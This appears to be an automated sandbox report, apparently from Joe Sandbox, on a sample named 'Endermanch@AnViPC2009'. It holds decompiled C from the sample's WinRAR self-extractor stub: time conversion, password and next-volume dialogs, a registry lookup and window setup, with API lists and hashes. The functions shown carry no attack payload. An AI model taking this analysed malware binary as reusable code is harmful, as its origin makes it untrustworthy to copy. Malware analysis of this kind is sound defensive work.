                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040E04D(void* __ebx, signed int* __ecx, FILETIME* _a4) {
                                                                                                                                                  				struct _FILETIME _v12;
                                                                                                                                                  				struct _FILETIME _v20;
                                                                                                                                                  				struct _SYSTEMTIME _v36;
                                                                                                                                                  				signed int _t34;
                                                                                                                                                  				void* _t37;
                                                                                                                                                  				signed int _t50;
                                                                                                                                                  				intOrPtr* _t56;
                                                                                                                                                  				signed int* _t57;
                                                                                                                                                  
                                                                                                                                                  				_t57 = __ecx;
                                                                                                                                                  				FileTimeToLocalFileTime(_a4,  &_v12);
                                                                                                                                                  				FileTimeToSystemTime( &_v12,  &_v36);
                                                                                                                                                  				_t34 = _v36.wDay & 0x0000ffff;
                                                                                                                                                  				_t50 = _v36.wMonth & 0x0000ffff;
                                                                                                                                                  				_t51 = _v36.wYear & 0x0000ffff;
                                                                                                                                                  				_t57[3] = _v36.wHour & 0x0000ffff;
                                                                                                                                                  				_t57[2] = _t34;
                                                                                                                                                  				_t57[4] = _v36.wMinute & 0x0000ffff;
                                                                                                                                                  				_t57[8] = _t34 - 1;
                                                                                                                                                  				_t57[5] = _v36.wSecond & 0x0000ffff;
                                                                                                                                                  				_t37 = 1;
                                                                                                                                                  				 *_t57 = _v36.wYear & 0x0000ffff;
                                                                                                                                                  				_t57[1] = _t50;
                                                                                                                                                  				_t57[7] = _v36.wDayOfWeek & 0x0000ffff;
                                                                                                                                                  				if(_t50 > 1) {
                                                                                                                                                  					_t56 = 0x4140ec;
                                                                                                                                                  					do {
                                                                                                                                                  						_t57[8] = _t57[8] +  *_t56;
                                                                                                                                                  						_t37 = _t37 + 1;
                                                                                                                                                  						_t56 = _t56 + 4;
                                                                                                                                                  					} while (_t37 < _t50);
                                                                                                                                                  				}
                                                                                                                                                  				if(_t50 > 2 && E0040E018(_t51) != 0) {
                                                                                                                                                  					_t57[8] = _t57[8] + 1;
                                                                                                                                                  				}
                                                                                                                                                  				_v36.wMilliseconds = 0;
                                                                                                                                                  				SystemTimeToFileTime( &_v36,  &_v20);
                                                                                                                                                  				_t57[6] = _v12.dwLowDateTime - _v20.dwLowDateTime;
                                                                                                                                                  				return _t57;
                                                                                                                                                  			}











                                                                                                                                                  0x0040e05c
                                                                                                                                                  0x0040e05e
                                                                                                                                                  0x0040e06c
                                                                                                                                                  0x0040e076
                                                                                                                                                  0x0040e07a
                                                                                                                                                  0x0040e07e
                                                                                                                                                  0x0040e082
                                                                                                                                                  0x0040e089
                                                                                                                                                  0x0040e08c
                                                                                                                                                  0x0040e094
                                                                                                                                                  0x0040e099
                                                                                                                                                  0x0040e0a0
                                                                                                                                                  0x0040e0a1
                                                                                                                                                  0x0040e0a3
                                                                                                                                                  0x0040e0a6
                                                                                                                                                  0x0040e0ab
                                                                                                                                                  0x0040e0ad
                                                                                                                                                  0x0040e0b3
                                                                                                                                                  0x0040e0b5
                                                                                                                                                  0x0040e0b8
                                                                                                                                                  0x0040e0b9
                                                                                                                                                  0x0040e0bc
                                                                                                                                                  0x0040e0c0
                                                                                                                                                  0x0040e0c4
                                                                                                                                                  0x0040e0d0
                                                                                                                                                  0x0040e0d0
                                                                                                                                                  0x0040e0d5
                                                                                                                                                  0x0040e0e1
                                                                                                                                                  0x0040e0ee
                                                                                                                                                  0x0040e0f5

                                                                                                                                                  APIs
                                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,01000000,00000000,?,?,?,?), ref: 0040E05E
                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040E06C
                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 0040E0E1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Time$File$System$Local
                                                                                                                                                  • String ID: @A
                                                                                                                                                  • API String ID: 2859370177-361999007
                                                                                                                                                  • Opcode ID: adf7c2f7cc2eb2dd66c139f7d906b26c70349401397584d72f501528abe1a243
                                                                                                                                                  • Instruction ID: f7a1b3028853772f18daed3c9b345ebae55ea64eca81d075197798a516cfa776
                                                                                                                                                  • Opcode Fuzzy Hash: adf7c2f7cc2eb2dd66c139f7d906b26c70349401397584d72f501528abe1a243
                                                                                                                                                  • Instruction Fuzzy Hash: 30212CB59002199BCB60DFAAC8408FFFBF9FE48701B10492BE586E3640E378D554CB64
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                  			E0040B3B3(void* __ecx, void* __edx, struct HWND__* _a4, intOrPtr _a8, signed short _a12, CHAR* _a16) {
                                                                                                                                                  				void* _t9;
                                                                                                                                                  				void* _t16;
                                                                                                                                                  				void* _t19;
                                                                                                                                                  				intOrPtr _t21;
                                                                                                                                                  				struct HWND__* _t26;
                                                                                                                                                  				CHAR* _t27;
                                                                                                                                                  
                                                                                                                                                  				_t27 = _a16;
                                                                                                                                                  				_t26 = _a4;
                                                                                                                                                  				E00403059(__edx, _t26, _a8, _a12, _t27, "ASKNEXTVOL", 0, 0);
                                                                                                                                                  				_t9 = _a8 - 0x110;
                                                                                                                                                  				if(_t9 == 0) {
                                                                                                                                                  					 *0x41f324 = _t27;
                                                                                                                                                  					_push(_t27);
                                                                                                                                                  					L12:
                                                                                                                                                  					SetDlgItemTextA(_t26, 0x65, ??);
                                                                                                                                                  					L13:
                                                                                                                                                  					return 1;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t9 != 1) {
                                                                                                                                                  					L5:
                                                                                                                                                  					return 0;
                                                                                                                                                  				}
                                                                                                                                                  				_t16 = (_a12 & 0x0000ffff) - 1;
                                                                                                                                                  				if(_t16 == 0) {
                                                                                                                                                  					GetDlgItemTextA(_t26, 0x65,  *0x41f324, 0x400);
                                                                                                                                                  					_push(1);
                                                                                                                                                  					L9:
                                                                                                                                                  					EndDialog(_t26, ??);
                                                                                                                                                  					goto L13;
                                                                                                                                                  				}
                                                                                                                                                  				_t19 = _t16 - 1;
                                                                                                                                                  				if(_t19 == 0) {
                                                                                                                                                  					_push(0);
                                                                                                                                                  					goto L9;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t19 == 0x64) {
                                                                                                                                                  					_t21 = E004073B4( *0x41f324);
                                                                                                                                                  					if(E00402810(_t26, E004098D0(0x7b),  *0x41f324, _t21, 0) == 0) {
                                                                                                                                                  						goto L13;
                                                                                                                                                  					}
                                                                                                                                                  					_push( *0x41f324);
                                                                                                                                                  					goto L12;
                                                                                                                                                  				}
                                                                                                                                                  				goto L5;
                                                                                                                                                  			}









                                                                                                                                                  0x0040b3b7
                                                                                                                                                  0x0040b3bb
                                                                                                                                                  0x0040b3cf
                                                                                                                                                  0x0040b3d7
                                                                                                                                                  0x0040b3dc
                                                                                                                                                  0x0040b445
                                                                                                                                                  0x0040b44b
                                                                                                                                                  0x0040b44c
                                                                                                                                                  0x0040b44f
                                                                                                                                                  0x0040b455
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b457
                                                                                                                                                  0x0040b3df
                                                                                                                                                  0x0040b3f0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b3f0
                                                                                                                                                  0x0040b3e5
                                                                                                                                                  0x0040b3e6
                                                                                                                                                  0x0040b43b
                                                                                                                                                  0x0040b441
                                                                                                                                                  0x0040b424
                                                                                                                                                  0x0040b425
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b425
                                                                                                                                                  0x0040b3e8
                                                                                                                                                  0x0040b3e9
                                                                                                                                                  0x0040b422
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b422
                                                                                                                                                  0x0040b3ee
                                                                                                                                                  0x0040b3fc
                                                                                                                                                  0x0040b418
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b41a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b41a
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ItemText$Dialog
                                                                                                                                                  • String ID: ASKNEXTVOL
                                                                                                                                                  • API String ID: 1770891597-3402441367
                                                                                                                                                  • Opcode ID: 18bcb60c88717f8ae067db0437e97dd1ccc9c733cbe48cde6d31b5fb1c87f75f
                                                                                                                                                  • Instruction ID: 33502fc4e3c774c2891e7e54ec09dfb759c41af6b3abb37e780b579720e66abe
                                                                                                                                                  • Opcode Fuzzy Hash: 18bcb60c88717f8ae067db0437e97dd1ccc9c733cbe48cde6d31b5fb1c87f75f
                                                                                                                                                  • Instruction Fuzzy Hash: A911A032140108BADB116F959D09FBB3B68EB05B01F108036BB00B51D3C3B99922E7AD
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  • SHGetMalloc.SHELL32(?), ref: 004027A1
                                                                                                                                                  • SHBrowseForFolderA.SHELL32(?,?), ref: 004027DC
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BrowseFolderMalloc
                                                                                                                                                  • String ID: A
                                                                                                                                                  • API String ID: 3812826013-3554254475
                                                                                                                                                  • Opcode ID: 536474bc935bf22df2b89972fbf85ec52f79c940274fa63940bbf5dc9eb7fe8a
                                                                                                                                                  • Instruction ID: 07f9a62c01355bfa8b2fe6d81470485e8e781270ab6e07938e1ed113a1b24fa7
                                                                                                                                                  • Opcode Fuzzy Hash: 536474bc935bf22df2b89972fbf85ec52f79c940274fa63940bbf5dc9eb7fe8a
                                                                                                                                                  • Instruction Fuzzy Hash: C0016D76900219AFCF10CFA4C948BEF77F8AF49311F104566E805E7280D778CA158BA4
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                                  			E0040B1EC(struct HWND__* _a4, intOrPtr _a8, signed short _a12, CHAR* _a16) {
                                                                                                                                                  				void* _t10;
                                                                                                                                                  				void* _t17;
                                                                                                                                                  				void* _t21;
                                                                                                                                                  				struct HWND__* _t22;
                                                                                                                                                  
                                                                                                                                                  				_t22 = _a4;
                                                                                                                                                  				E00403059(_t21, _t22, _a8, _a12, _a16, "GETPASSWORD1", 0, 0);
                                                                                                                                                  				_t10 = _a8 - 0x110;
                                                                                                                                                  				if(_t10 == 0) {
                                                                                                                                                  					SetDlgItemTextA(_t22, 0x66, _a16);
                                                                                                                                                  					L9:
                                                                                                                                                  					return 1;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t10 != 1) {
                                                                                                                                                  					L4:
                                                                                                                                                  					return 0;
                                                                                                                                                  				}
                                                                                                                                                  				_t17 = (_a12 & 0x0000ffff) - 1;
                                                                                                                                                  				if(_t17 == 0) {
                                                                                                                                                  					GetDlgItemTextA(_t22, 0x65, 0x419ee8, 0x80);
                                                                                                                                                  					_push(1);
                                                                                                                                                  					L6:
                                                                                                                                                  					EndDialog(_t22, ??);
                                                                                                                                                  					goto L9;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t17 == 1) {
                                                                                                                                                  					_push(0);
                                                                                                                                                  					goto L6;
                                                                                                                                                  				}
                                                                                                                                                  				goto L4;
                                                                                                                                                  			}







                                                                                                                                                  0x0040b1f0
                                                                                                                                                  0x0040b206
                                                                                                                                                  0x0040b20e
                                                                                                                                                  0x0040b213
                                                                                                                                                  0x0040b24e
                                                                                                                                                  0x0040b254
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b256
                                                                                                                                                  0x0040b216
                                                                                                                                                  0x0040b222
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b222
                                                                                                                                                  0x0040b21c
                                                                                                                                                  0x0040b21d
                                                                                                                                                  0x0040b23e
                                                                                                                                                  0x0040b244
                                                                                                                                                  0x0040b228
                                                                                                                                                  0x0040b229
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b229
                                                                                                                                                  0x0040b220
                                                                                                                                                  0x0040b226
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b226
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ItemText$Dialog
                                                                                                                                                  • String ID: GETPASSWORD1
                                                                                                                                                  • API String ID: 1770891597-3292211884
                                                                                                                                                  • Opcode ID: bf0d03eac6e9e68a650a97090f55db646eabfd77957b11add9493460e6de1b82
                                                                                                                                                  • Instruction ID: 727e386470d6b7359cf29fdd46d7f12e96c628ad1092937243739836d42877c7
                                                                                                                                                  • Opcode Fuzzy Hash: bf0d03eac6e9e68a650a97090f55db646eabfd77957b11add9493460e6de1b82
                                                                                                                                                  • Instruction Fuzzy Hash: 1DF0AF32280219BADB21AF90AC09FFF3614EF05741F008426FB01F90D0C7BA996097AE
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040B989(void* __esi, intOrPtr _a4) {
                                                                                                                                                  				void* _v8;
                                                                                                                                                  				int _v12;
                                                                                                                                                  				int _v16;
                                                                                                                                                  				char _v1040;
                                                                                                                                                  				char _v2064;
                                                                                                                                                  				long _t13;
                                                                                                                                                  
                                                                                                                                                  				if( *0x419f90 != 0) {
                                                                                                                                                  					E0040B8DA( &_v1040, _a4);
                                                                                                                                                  					_t13 = RegOpenKeyExA(0x80000001, "Software\\WinRAR SFX", 0, 1,  &_v8);
                                                                                                                                                  					if(_t13 == 0) {
                                                                                                                                                  						_v12 = 0x400;
                                                                                                                                                  						if(RegQueryValueExA(_v8,  &_v1040, 0,  &_v16,  &_v2064,  &_v12) == 0) {
                                                                                                                                                  							E0040A450(_a4,  &_v2064);
                                                                                                                                                  						}
                                                                                                                                                  						return RegCloseKey(_v8);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t13;
                                                                                                                                                  			}









                                                                                                                                                  0x0040b999
                                                                                                                                                  0x0040b9a5
                                                                                                                                                  0x0040b9bc
                                                                                                                                                  0x0040b9c5
                                                                                                                                                  0x0040b9e2
                                                                                                                                                  0x0040b9f1
                                                                                                                                                  0x0040b9fd
                                                                                                                                                  0x0040b9fd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040ba05
                                                                                                                                                  0x0040b9c5
                                                                                                                                                  0x0040ba0c

                                                                                                                                                  APIs
                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\WinRAR SFX,00000000,00000001,0000000C,?,00000022), ref: 0040B9BC
                                                                                                                                                  • RegQueryValueExA.ADVAPI32(0000000C,?,00000000,00000000,?,?), ref: 0040B9E9
                                                                                                                                                  • RegCloseKey.ADVAPI32(0000000C), ref: 0040BA05
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                  • String ID: Software\WinRAR SFX
                                                                                                                                                  • API String ID: 3677997916-754673328
                                                                                                                                                  • Opcode ID: 19f740545e227c547a251f79ce2109e0e7da7a0d7633267ff09baeccc2603ac4
                                                                                                                                                  • Instruction ID: 3f23dcb504f6c7536a58f760981765d7b3fa3855f42e25cd05d4780c02d3a9c9
                                                                                                                                                  • Opcode Fuzzy Hash: 19f740545e227c547a251f79ce2109e0e7da7a0d7633267ff09baeccc2603ac4
                                                                                                                                                  • Instruction Fuzzy Hash: 0C01EC75500109FAEB11DB90DD45FDE7BBCEB04348F5081A2BB05F10A0D7B49A59DBAD
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                                  			E00409688(void* __ecx) {
                                                                                                                                                  				char _v1028;
                                                                                                                                                  				struct HINSTANCE__* _t5;
                                                                                                                                                  				struct HRSRC__* _t6;
                                                                                                                                                  				signed int _t10;
                                                                                                                                                  				char _t12;
                                                                                                                                                  				void* _t16;
                                                                                                                                                  
                                                                                                                                                  				_t16 = __ecx;
                                                                                                                                                  				_t5 = GetModuleHandleA(0);
                                                                                                                                                  				_t17 = "RTL";
                                                                                                                                                  				_t6 = FindResourceA(_t5, "RTL", 5);
                                                                                                                                                  				if(_t6 == 0) {
                                                                                                                                                  					E0040952C(_t16, "LTR",  &_v1028, 1, "LTR");
                                                                                                                                                  					_t10 = E0040A4C2( &_v1028, _t17);
                                                                                                                                                  					asm("sbb al, al");
                                                                                                                                                  					_t12 =  ~_t10 + 1;
                                                                                                                                                  					 *((char*)(_t16 + 0x10)) = _t12;
                                                                                                                                                  					return _t12;
                                                                                                                                                  				}
                                                                                                                                                  				 *((char*)(_t16 + 0x10)) = 1;
                                                                                                                                                  				return _t6;
                                                                                                                                                  			}









                                                                                                                                                  0x00409695
                                                                                                                                                  0x00409697
                                                                                                                                                  0x0040969f
                                                                                                                                                  0x004096a6
                                                                                                                                                  0x004096ae
                                                                                                                                                  0x004096c8
                                                                                                                                                  0x004096d5
                                                                                                                                                  0x004096dc
                                                                                                                                                  0x004096de
                                                                                                                                                  0x004096e0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004096e0
                                                                                                                                                  0x004096b0
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,00414C88), ref: 00409697
                                                                                                                                                  • FindResourceA.KERNEL32(00000000,RTL,00000005), ref: 004096A6
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FindHandleModuleResource
                                                                                                                                                  • String ID: LTR$RTL
                                                                                                                                                  • API String ID: 3537982541-719208805
                                                                                                                                                  • Opcode ID: b0e78cae33823b620977f423fd0db6685158b71de1a57790fd83f1c0403f4661
                                                                                                                                                  • Instruction ID: eb84699a9ebcd1787519a0d4571ceb08e559b90d308b3ad9be416bd68c0d2478
                                                                                                                                                  • Opcode Fuzzy Hash: b0e78cae33823b620977f423fd0db6685158b71de1a57790fd83f1c0403f4661
                                                                                                                                                  • Instruction Fuzzy Hash: 43F0B4716002147AD71066758C0AFEB2A5CDB41704F04057AB709E21C2DBF89A95C7A9
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                  			E004032C5(void* __ecx, intOrPtr _a4) {
                                                                                                                                                  				char _v1284;
                                                                                                                                                  				long _t11;
                                                                                                                                                  				int _t14;
                                                                                                                                                  				signed int _t16;
                                                                                                                                                  				void* _t19;
                                                                                                                                                  
                                                                                                                                                  				_t19 = __ecx;
                                                                                                                                                  				if( *((char*)(__ecx + 9)) != 0) {
                                                                                                                                                  					return 0;
                                                                                                                                                  				}
                                                                                                                                                  				_push(_t16);
                                                                                                                                                  				E0040A5E9(_t19,  &_v1284, E004098D0(0x74), _a4);
                                                                                                                                                  				_t11 = GetLastError();
                                                                                                                                                  				_t14 = MessageBoxA( *0x419f7c,  &_v1284, E004098D0(0x7e), 0x35);
                                                                                                                                                  				SetLastError(_t11);
                                                                                                                                                  				return _t16 & 0xffffff00 | _t14 == 0x00000004;
                                                                                                                                                  			}








                                                                                                                                                  0x004032c5
                                                                                                                                                  0x004032d2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403328
                                                                                                                                                  0x004032d4
                                                                                                                                                  0x004032e8
                                                                                                                                                  0x004032f0
                                                                                                                                                  0x0040330f
                                                                                                                                                  0x0040331c
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 004098D0: LoadStringA.USER32 ref: 0040991F
                                                                                                                                                    • Part of subcall function 004098D0: LoadStringA.USER32 ref: 00409931
                                                                                                                                                    • Part of subcall function 0040A5E9: wvsprintfA.USER32 ref: 0040A5FC
                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,766DFC30), ref: 004032F0
                                                                                                                                                  • MessageBoxA.USER32 ref: 0040330F
                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 0040331C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastLoadString$Messagewvsprintf
                                                                                                                                                  • String ID: @Mhv
                                                                                                                                                  • API String ID: 2448956881-3595611156
                                                                                                                                                  • Opcode ID: 18b26985c3fde19bf768024d8bfe0f3651ec3641b082fce51e02c335d1dfe77f
                                                                                                                                                  • Instruction ID: 230d6e827fbfc9e33d024bb26a1560665568d920f9f36c62b1eab52cea5c9e75
                                                                                                                                                  • Opcode Fuzzy Hash: 18b26985c3fde19bf768024d8bfe0f3651ec3641b082fce51e02c335d1dfe77f
                                                                                                                                                  • Instruction Fuzzy Hash: 75F059328402047BDB107B709C09FDF3B9C9B05345F048073F601E61D1EAB89919CB68
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00406CAF(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                                                                  				struct _WNDCLASSEXA _v52;
                                                                                                                                                  				short _t17;
                                                                                                                                                  				intOrPtr* _t18;
                                                                                                                                                  				intOrPtr _t21;
                                                                                                                                                  
                                                                                                                                                  				_t21 = _a4;
                                                                                                                                                  				_t18 = __ecx;
                                                                                                                                                  				_v52.cbSize = 0x30;
                                                                                                                                                  				_v52.style = 0x828;
                                                                                                                                                  				_v52.lpfnWndProc = E00406C31;
                                                                                                                                                  				_v52.cbClsExtra = 0;
                                                                                                                                                  				_v52.cbWndExtra = 0;
                                                                                                                                                  				_v52.hInstance = _t21;
                                                                                                                                                  				_v52.hIcon = 0;
                                                                                                                                                  				_v52.hCursor = LoadCursorA(0, 0x7f00);
                                                                                                                                                  				_v52.hbrBackground = 6;
                                                                                                                                                  				_v52.lpszMenuName = 0;
                                                                                                                                                  				_v52.lpszClassName = "RarHtmlClassName";
                                                                                                                                                  				_v52.hIconSm = 0;
                                                                                                                                                  				_t17 = RegisterClassExA( &_v52);
                                                                                                                                                  				 *_t18 = _t21;
                                                                                                                                                  				return _t17;
                                                                                                                                                  			}







                                                                                                                                                  0x00406cb7
                                                                                                                                                  0x00406cc3
                                                                                                                                                  0x00406cc5
                                                                                                                                                  0x00406ccc
                                                                                                                                                  0x00406cd3
                                                                                                                                                  0x00406cda
                                                                                                                                                  0x00406cdd
                                                                                                                                                  0x00406ce0
                                                                                                                                                  0x00406ce3
                                                                                                                                                  0x00406cec
                                                                                                                                                  0x00406cf3
                                                                                                                                                  0x00406cfa
                                                                                                                                                  0x00406cfd
                                                                                                                                                  0x00406d04
                                                                                                                                                  0x00406d07
                                                                                                                                                  0x00406d0e
                                                                                                                                                  0x00406d13

                                                                                                                                                  APIs
                                                                                                                                                  • LoadCursorA.USER32 ref: 00406CE6
                                                                                                                                                  • RegisterClassExA.USER32(00000030), ref: 00406D07
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
